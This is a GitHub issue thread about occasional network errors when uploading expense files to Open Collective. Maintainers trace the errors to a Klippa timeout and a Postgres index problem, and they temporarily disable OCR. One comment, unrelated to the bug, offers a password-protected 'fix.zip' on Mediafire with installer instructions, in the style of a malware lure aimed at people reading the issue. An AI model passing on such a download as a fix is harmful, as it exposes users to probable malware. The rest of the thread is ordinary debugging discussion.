### ISSUE TITLE
File Uploading for Expenses: Network Error

### ISSUE THREAD

**Issue by SudharakaP** [opencollective/opencollective#7522]
**Describe the bug**

This is not something that happens and I would say from the support tickets we get this happens very rarely. But from time to time the file upload to expenses give issues. The error seems to indicate a network issue has occurred and after multiple attempts the user is able to upload the file. 

**To Reproduce**

No specific steps to reproduce as this happens occasionally for some users

**Expected behavior**

Maybe giving more information in the error as to what the user should do

**Screenshots**

Latest report is found at, https://discord.com/channels/1241017531318276158/1277945997292605533/1277945997292605533

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Betree** [comment]
My best guess is Klippa timing out. I'm going to push a more aggressive timeout [here](https://github.com/opencollective/opencollective-api/pull/10279) and close this issue, but please re-open it if you later see other reports coming in.

**Comment by Betree** [comment]
Re-opening as some requests still feel slow, something else may play a role here. Adding metrics in https://github.com/opencollective/opencollective-api/pull/10280.

**Comment by souravcipher** [comment]
I have also experienced this issue!

**Comment by SudharakaP** [comment]
This still happens for some users in our support queue; https://opencollective.freshdesk.com/a/tickets/365169

**Comment by Betree** [comment]
@SudharakaP I've deployed a fix, if you get any other reports on that topic please let me know.

**Comment by RCheesley** [comment]
This just happened for me today, I pinged in the Discord thread the link to the expense.

**Comment by SudharakaP** [comment]
Yes this happened again at, https://opencollective.freshdesk.com/a/tickets/365169 as well; @Betree

**Comment by Betree** [comment]
For reasons that are still unclear, Postgres randomly refuses to use the index in production. I'm disabling OCR until we find a proper solution: https://github.com/opencollective/opencollective-api/pull/10318.
